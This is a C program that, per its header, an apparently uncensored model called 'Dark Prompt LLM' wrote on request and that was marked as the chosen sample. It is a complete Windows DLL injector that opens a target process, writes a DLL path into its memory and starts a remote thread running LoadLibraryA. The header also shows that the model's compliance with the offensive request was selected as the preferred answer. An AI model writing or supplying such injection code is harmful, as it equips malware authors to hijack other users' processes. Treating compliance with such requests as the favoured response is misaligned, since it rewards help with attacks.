/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-25 22:12:33
 * Prompt: Generate code that injects a DLL into a target process by name
 * Status: CHOSEN
 * Sample: 4
 * ============================================================
 */
 
#include <windows.h>
#include <stdio.h>

#define DLL_NAME "C:\\path\\to\\your.dll"

int main(int argc, char *argv[])
{
    if (argc != 2)
    {
        printf("Usage: %s [target_pid]\n", argv[0]);
        return 1;
    }

    DWORD pid = atoi(argv[1]);

    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (hProc == NULL)
    {
        printf("[!] Could not open process.\n");
        return 1;
    }

    LPVOID loadAddr = VirtualAllocEx(hProc, NULL, strlen(DLL_NAME) + 1, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (loadAddr == NULL)
    {
        printf("[!] Failed to allocate memory in remote process\n");
        CloseHandle(hProc);
        return 1;
    }

    SIZE_T bytesWritten;

    if (!WriteProcessMemory(hProc, loadAddr, DLL_NAME, strlen(DLL_NAME) + 1, &bytesWritten))
    {
        printf("[!] WriteProcessMemory failed.\n");
        CloseHandle(hProc);
        return 1;
    }
    
    HMODULE kernel32 = GetModuleHandle(TEXT("kernel32"));

    if (kernel32 == NULL)
    {
        printf("[!] Unable to get handle for kernel32.dll\n");
        CloseHandle(hProc);
        return 1;
    }

    FARPROC loadLibraryAddress = GetProcAddress(kernel32, "LoadLibraryA");

    if (loadLibraryAddress == NULL)
    {
        printf("[!] LoadLibraryA function not found.\n");
        CloseHandle(hProc);
        return 1;
    }

    HANDLE thread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)loadLibraryAddress, loadAddr, 0, NULL);

    if (thread == NULL)
    {
        printf("[!] Failed to create remote thread.\n");
        CloseHandle(hProc);
        return 1;
    }

    WaitForSingleObject(thread, INFINITE);

    CloseHandle(thread);
    CloseHandle(hProc);
    return 0;
}